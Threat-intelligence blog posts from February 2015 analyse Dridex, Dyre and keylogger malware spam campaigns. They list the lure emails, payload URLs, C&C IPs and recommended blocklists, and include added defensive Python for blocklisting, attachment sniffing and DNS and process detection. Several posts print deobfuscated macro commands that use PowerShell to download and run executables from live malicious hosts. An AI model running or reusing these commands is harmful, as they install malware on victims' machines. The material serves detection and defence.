I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirety of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU
admin-c: PPP9992-RIPE
tech-c: PPP9992-RIPE
status: ASSIGNED PA
mnt-by: DN-MNT
changed: ncc@msm.ru 20150213
source: RIPE
person: Andrey Tkachenko
address: 107589, Russia Moscow street Khabarovsk 4A
e-mail: cc-it@com4tel.ru
phone: +7 916 626 7798
fax-no: +7 916 626 7798
nic-hdl: PPP9992-RIPE
abuse-mailbox: info@cloudavt.com
mnt-by: DN-MNT
changed: noc@msm.ru 20140429
source: RIPE
route: 95.163.64.0/18
descr: Digital Network JSC
descr: Moscow, Russia
descr: http://www.msm.ru
descr: aggregate prefix
origin: AS12695
mnt-by: DN-MNT
changed: noc@msm.ru 20121129
source: RIPE
Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]
That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.
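As an added illustration (not part of the original post), the following Python checks how tightly the five addresses listed above cluster, and shows what blocking the recommended /24 would catch on a few constructed outbound-connection log lines. The log line format, the 10.0.0.x clients and the destination 95.163.121.5 (an address in the block that the post does not name) are assumptions made for the example.

```python
import ipaddress

# Addresses named above as recently hosting malicious content.
BAD_HOSTS = ["95.163.121.71", "95.163.121.72", "95.163.121.188",
             "95.163.121.216", "95.163.121.217"]

# The range the post recommends blocking, and the parent aggregate from the RIPE route object.
RECOMMENDED_BLOCKS = ["95.163.121.0/24"]
PARENT_AGGREGATE = "95.163.64.0/18"

# Constructed outbound-connection log lines (not taken from the post); dst 93.184.216.34 is a
# benign placeholder and 95.163.121.5 is an address in the block that the post does not name.
SAMPLE_LOG = [
    "2015-02-13T10:58:01 src=10.0.0.15 dst=95.163.121.217 dport=80 action=allow",
    "2015-02-13T10:58:04 src=10.0.0.15 dst=93.184.216.34 dport=443 action=allow",
    "2015-02-13T11:02:17 src=10.0.0.22 dst=95.163.121.5 dport=8080 action=allow",
]


def smallest_covering_prefix(addresses):
    """Tightest single CIDR containing every address: a measure of how concentrated the hits are."""
    ips = [ipaddress.ip_address(a) for a in addresses]
    net = ipaddress.ip_network(addresses[0])        # starts as a /32, widened until it fits all
    while not all(ip in net for ip in ips):
        net = net.supernet()
    return str(net)


def covering_blocks(address, blocks):
    """Every block in the list that contains the address, so a hit can be traced to its rule."""
    ip = ipaddress.ip_address(address)
    return [b for b in blocks if ip in ipaddress.ip_network(b)]


def flag_connections(log_lines, blocks):
    """Return (src, dst, matching block) for each log line whose destination is blocklisted."""
    nets = [ipaddress.ip_network(b) for b in blocks]
    hits = []
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split()[1:])   # skip the timestamp
        dst = ipaddress.ip_address(fields["dst"])
        for net in nets:
            if dst in net:
                hits.append((fields["src"], fields["dst"], str(net)))
                break
    return hits


if __name__ == "__main__":
    print("bad hosts fit inside", smallest_covering_prefix(BAD_HOSTS))
    for src, dst, net in flag_connections(SAMPLE_LOG, RECOMMENDED_BLOCKS):
        print("%s -> %s matched %s" % (src, dst, net))
```

The third log line is the reason for blocking the whole /24 rather than the five named hosts: a connection to an address in the block that has not yet appeared in anyone's report is still caught.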
Friday, 13 February 2015
Malware spam: "Alison Longworth [ALongworth@usluk.com]" / "PURCHASE ORDER (34663)"
From Alison Longworth [ALongworth@usluk.com]
Date 13/02/2015 10:57
Subject PURCHASE ORDER (34663)
Please find attachment below of our Purchase Order No. 34663. Could you
please confirm receipt of this order and also advise when goods will be
available to collect.
NOTE TO ACCOUNTS: Could you please ensure all invoices for goods supplied
are forwarded promptly. Invoices received later than 2 working days after
month end will be dated, processed and paid the following month. To avoid
delays invoices can be sent electronically to accounts@usluk.com
Many Thanks,
Kind Regards,
Alison Longworth
Buyer (Manufacturing)
Universal Sealants (UK) Limited
Kingston House
3 Walton Road
Pattinson North
Washington
Tyne & Wear
NE38 8QA
W: www.usluk.com
E: alison.longworth@usluk.com
T: +44(0)191 416 1530
F: +44(0)191 402 1982
…Complete Solution for Bridge Deck Protection
USL BridgeCare, USL StructureCare, Nufins and Visul Systems are trading
divisions of Universal Sealants (UK) Limited.
Registered Office: Kingston House, 3 Walton Road, Pattinson North,
Washington, Tyne & Wear, NE38 8QA
Company Registration: 01494603
VAT Number: 353 8952 22
This email and any files transmitted with it are strictly confidential. It
is for the intended recipient only. If you have received this email in
error please notify the author by replying to this email. If you are not
the intended recipient, you must not disclose, copy, print or rely on this
email in any way. Any views expressed by an individual within email which
do not constitute or record professional advice relating to the business
of USL BridgeCare, USL StructureCare, Nufins and Visul Systems, do not
necessarily reflect the views of the company.
Important Notice
The information contained in this communication (including any
attachments) is confidential, may be attorney-client privileged, may
constitute inside information, and is intended only for the use of the
addressee. *Any Unauthorized use, disclosure or copying of this
information or any part thereof is strictly prohibited and may be
unlawful. If you have received this communication in error, please notify
us immediately by return e-mail and destroy this communication and all
copies thereof, including all attachments.
Attached is a malicious Word document 2600_001.DOC which actually comes in two different versions with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from the following locations:
http://stroygp.ru/js/bin.exe
http://ibw-bautzen.de/js/bin.exe
This is saved as %TEMP%\dsHHH.exe and it has a detection rate of 13/57. Automated analysis tools [1] [2] [3] show the malware POSTing to:
37.139.47.105 (Pirix, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
The malware also drops a DLL with an MD5 of 6693f0093a2d6740149de5d6e950f6c6 (VT 6/57) which is the same Dridex DLL used in this campaign.
Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"
This email with no body text comes with a malicious Excel attachment:
From: Amazon Marketplace [delivery@amazon.uk]
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';
The downloaded file dhoei.exe is exactly the same as used in this spam run.
Malware spam: "Remittance XX12345678"
This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
There is a malicious Word document attached to the email; so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macro which downloads a file from the following location:
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identified as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates some attempted traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
Thursday, 12 February 2015
Questionable network: 5.135.127.64/27 / userlogin.me
While researching this spam I came across a questionable OVH reseller using the 5.135.127.64/27 range, allocated to userlogin.me.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records shows a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare, some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associated with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are... interesting.
"invoice :reminder" spam leads to CVE-2012-0158 exploit
This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@valueline.in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57. Those detections indicate that this is exploiting CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Google Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
Malware spam: "BBB Accreditation Services [no-replay@newyork.bbb.org]" / "BBB SBQ Form"
This fake BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@newyork.bbb.org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that it attempts to connect to the following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
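Both the INVOICE.doc that is really an RTF file (in the "invoice :reminder" post above) and the SQB Form.zip carrying an executable can be caught at the mail gateway by looking at what an attachment actually contains rather than at its name. The following Python is an added example, not code from the original post; the sample files it builds are constructed stand-ins with the right leading bytes, not the real attachments, and the extension-to-format table is an assumption for the example.

```python
import io
import os
import zipfile

# Leading bytes of the container formats that commonly arrive as "invoices" and "forms".
SIGNATURES = [
    (b"{\\rtf", "rtf"),                                # RTF, the real format of INVOICE.doc
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),    # legacy .doc/.xls compound file
    (b"PK\x03\x04", "zip"),                            # .zip, and also .docx/.xlsx containers
    (b"MZ", "pe"),                                     # Windows executable
    (b"%PDF", "pdf"),
]

# What a given extension should look like inside; anything else is worth a closer look.
EXPECTED = {".doc": "ole2", ".xls": "ole2", ".docx": "zip", ".xlsx": "zip",
            ".rtf": "rtf", ".pdf": "pdf", ".zip": "zip", ".exe": "pe"}


def sniff(data):
    """Identify a blob by its magic bytes, ignoring whatever extension it carries."""
    for magic, fmt in SIGNATURES:
        if data.startswith(magic):
            return fmt
    return "unknown"


def archive_members(data):
    """(name, first bytes) for each file inside a ZIP held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                yield info.filename, zf.read(info.filename)[:8]


def check_attachment(filename, data):
    """Report extension/content mismatches and executables hidden inside ZIP attachments."""
    ext = os.path.splitext(filename)[1].lower()
    actual = sniff(data)
    findings = []
    expected = EXPECTED.get(ext)
    if expected and expected != actual:
        findings.append("extension %s but content is %s" % (ext, actual))
    if actual == "zip":
        for member, head in archive_members(data):
            if sniff(head) == "pe":
                findings.append("archive member %s is a Windows executable" % member)
    return {"file": filename, "actual": actual, "findings": findings}


def build_samples():
    """Constructed stand-ins for the lures discussed above; these are not the real samples."""
    rtf_as_doc = b"{\\rtf1\\ansi\\deff0 {\\object\\objocx ...}}"       # RTF text named INVOICE.doc
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("SQB Form.exe", b"MZ" + b"\x00" * 62)           # PE header stub inside the ZIP
    clean_doc = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24   # genuine OLE2 .doc header
    return {"INVOICE.doc": rtf_as_doc, "SQB Form.zip": buf.getvalue(), "quote.doc": clean_doc}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(check_attachment(name, blob))
```

Word will happily open an RTF that has been renamed to .doc, which is exactly why the mismatch is a useful gateway signal: a legitimate sender has no reason to relabel the file, and an OLE2 header on a .doc is what the attachment should have.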
Malware spam: "Minuteman Press West Loop" / "westloop@minutemanpress.com" / "INVOICE 1398 - FEB 4 2015"
This fake invoice comes with a malicious attachment. It does not come from Minuteman Press; their systems have not been compromised in any way. Instead this is a simple email forgery.
From: Minuteman Press West Loop [westloop@minutemanpress.com]
Reply-To: westloop@minutemanpress.com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57 and contains this malicious macro which downloads a second component from:
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
Wednesday, 11 February 2015
Malware spam: "Gail Walker [gail@mblseminars.com]" / "Outstanding Invoice 271741"
This fake invoice does NOT come from MBL Seminars; they are not sending this spam nor have their systems been compromised. Instead, this is a forgery with a malicious attachment.
From: Gail Walker [gail@mblseminars.com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited
The Mill House
6 Worsley Road
Worsley
Manchester
United Kingdom
M28 2NL
Tel: +44 (0)161 793 0984
Fax: +44 (0)161 728 8139
So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each [1] [2]. These download a component from the following locations:
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
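The three nonexistent domains above, and the checkip.dyndns.org lookup called out in the BBB post above, are both things a resolver log can surface. The following Python is an added example and not code from the original post: it raises an alert on a watchlist lookup and on a client producing a burst of NXDOMAIN answers for random-looking names. The log line format, the 10.0.0.x clients and the thresholds are assumptions; the entropy test is a heuristic that will also fire on long real words, which is why it only counts when the lookup actually failed.

```python
import math
import re
from collections import Counter, defaultdict

WATCHLIST = {"checkip.dyndns.org"}   # named above as a frequent indicator of infection
NXDOMAIN_BURST = 3                   # distinct random-looking failures per client before alerting
ENTROPY_FLOOR = 3.0                  # bits per character; ordinary words sit well below this
MIN_LABEL = 10                       # the three domains above have 13-16 character labels

# Assumed resolver log format (constructed, not from the post): one query per line.
LOG_RE = re.compile(r"client=(?P<client>\S+)\s+query=(?P<query>\S+)\s+rcode=(?P<rcode>\S+)")

SAMPLE_DNS_LOG = [
    "2015-02-11T09:55:01 client=10.0.0.15 query=checkip.dyndns.org rcode=NOERROR",
    "2015-02-11T09:55:02 client=10.0.0.15 query=U1Q6nUgvQfsx4xDu.com rcode=NXDOMAIN",
    "2015-02-11T09:55:02 client=10.0.0.15 query=bpmIYYreSPwa7.com rcode=NXDOMAIN",
    "2015-02-11T09:55:03 client=10.0.0.15 query=zdMjztmwoDX7cD.com rcode=NXDOMAIN",
    "2015-02-11T09:55:04 client=10.0.0.22 query=www.example.com rcode=NOERROR",
    "2015-02-11T09:55:05 client=10.0.0.22 query=intranet.corp.example rcode=NXDOMAIN",
]


def label_entropy(label):
    """Shannon entropy of the label's characters, case-folded, in bits per character."""
    counts = Counter(label.lower())
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(domain):
    parts = domain.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(domain):
    """Long, high-entropy second-level label; weak on its own, so it is only counted on NXDOMAIN."""
    label = second_level_label(domain)
    return len(label) >= MIN_LABEL and label_entropy(label) >= ENTROPY_FLOOR


def analyse_dns_log(lines):
    """Return (client, reason, detail) alerts for watchlist lookups and NXDOMAIN bursts."""
    alerts = []
    failed = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        client, query, rcode = m.group("client"), m.group("query").lower(), m.group("rcode")
        if query in WATCHLIST:
            alerts.append((client, "watchlist lookup", query))
        if rcode == "NXDOMAIN" and looks_generated(query):
            failed[client].add(query)
            if len(failed[client]) == NXDOMAIN_BURST:   # fire once, when the threshold is reached
                alerts.append((client, "burst of random-looking NXDOMAINs",
                               ",".join(sorted(failed[client]))))
    return alerts


if __name__ == "__main__":
    for alert in analyse_dns_log(SAMPLE_DNS_LOG):
        print(alert)
```

Client 10.0.0.22 fails a lookup too, but for a short internal name, so it never reaches the burst threshold; the point of combining the entropy check with the response code is to keep that kind of noise out of the alert queue.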
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
UPDATE 2015-02-12
Another spam run is under way, with the same text but two different DOC files with zero detections [1] [2] containing one of two malicious macros [1] [2] that download another component from one of the following locations:
http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
Malware spam: "Your latest e-invoice from.."
This fake invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
The company name and the name of the sender vary, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The Word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
The macro is calling PowerShell to download and execute code from these locations:
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzner, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
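The three commands above (and the one in the Amazon Marketplace post further up) follow a single template: a WebClient.DownloadFile into %TEMP% followed by Start-Process on the same file, launched from an Office process. As an added example that is not part of the original post, this Python pulls the URL and drop path out of such a command line and classifies a process-creation event by whether an Office parent launched the full download-and-run chain. The event format, the 192.0.2.x addresses and the benign lookalike events are constructed for the example.

```python
import re
from urllib.parse import urlparse

# The two halves of the chain the deobfuscated macros hand to cmd.exe:
# WebClient.DownloadFile('<url>','<local path>') followed by Start-Process '<local path>'.
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.IGNORECASE)
START_RE = re.compile(r"Start-Process\s+'(?P<target>[^']+)'", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed process-creation events (parent image, child command line). The first mirrors the
# macro above with a TEST-NET address in place of the live host; the others are benign lookalikes.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE",
     "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
     "'http://192.0.2.10:8080/hhacz45a/mnnmz.php','%TEMP%\\pJIOfdfs.exe');"
     "Start-Process '%TEMP%\\pJIOfdfs.exe';"),
    ("C:\\Windows\\explorer.exe",
     "PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
     "'http://192.0.2.20/tools/agent.msi','C:\\Users\\admin\\Downloads\\agent.msi')"),
    ("C:\\Windows\\explorer.exe", "cmd /K dir %TEMP%"),
]


def extract_downloader_iocs(cmdline):
    """Pull the download URL, drop path and execution step out of a command line, or None."""
    dl = DOWNLOAD_RE.search(cmdline)
    if not dl:
        return None
    url, dest = dl.group("url"), dl.group("dest")
    parsed = urlparse(url)
    start = START_RE.search(cmdline)
    return {
        "url": url,
        "host": parsed.hostname,
        "port": parsed.port or (443 if parsed.scheme == "https" else 80),
        "path": parsed.path,
        "dropped_file": dest,
        "drops_to_temp": dest.upper().startswith("%TEMP%"),
        # only a full download-and-run chain if Start-Process names the file just written
        "executes_download": bool(start) and start.group("target") == dest,
    }


def classify_process_event(parent_image, cmdline):
    """'alert' when an Office process spawns a download-and-run chain, 'suspicious' for any
    other PowerShell WebClient download, 'benign' otherwise."""
    iocs = extract_downloader_iocs(cmdline)
    if not iocs or "powershell" not in cmdline.lower():
        return "benign", None
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and iocs["executes_download"]:
        return "alert", iocs
    return "suspicious", iocs


def triage(events):
    """Verdict for each (parent, cmdline) pair, in order."""
    return [classify_process_event(parent, cmdline)[0] for parent, cmdline in events]


if __name__ == "__main__":
    for (parent, cmdline), verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(verdict, parent.rsplit("\\", 1)[-1], extract_downloader_iocs(cmdline))
```

The alert verdict needs both an Office parent and the Start-Process step; an administrator fetching an installer with WebClient from a shell gets the weaker "suspicious" label, which keeps the rule usable on a fleet where PowerShell downloads are not unusual.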
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
Tuesday, 10 February 2015
Malware spam: "Megtrade groups [venkianch@gmail.com]" / "RE: Purchase Order Copy"
This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@gmail.com]
Reply-To: venkanch@gmail.com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd
Download Attachment As zip
Unusually, this email does not appear to be sent out by a botnet but has been sent through Gmail. The link in the email goes to www.ebayonline.com.ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named (1) Purchase Order Copy.pdf ___________________ (2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.
Friday, 6 February 2015
Something evil on 5.196.143.0/28 and 5.196.141.24/29 (verelox.com)
This quite interesting blog post from Cyphort got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more).
These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.
The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24
5.196.141.25
5.196.141.26
5.196.141.27
...you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:
5.196.143.3
5.196.143.4
5.196.143.5
5.196.143.6
5.196.143.7
5.196.143.8
5.196.143.10
5.196.143.11
5.196.143.12
5.196.143.13
...you can see a list of those domains in this pastebin.
Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:
Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
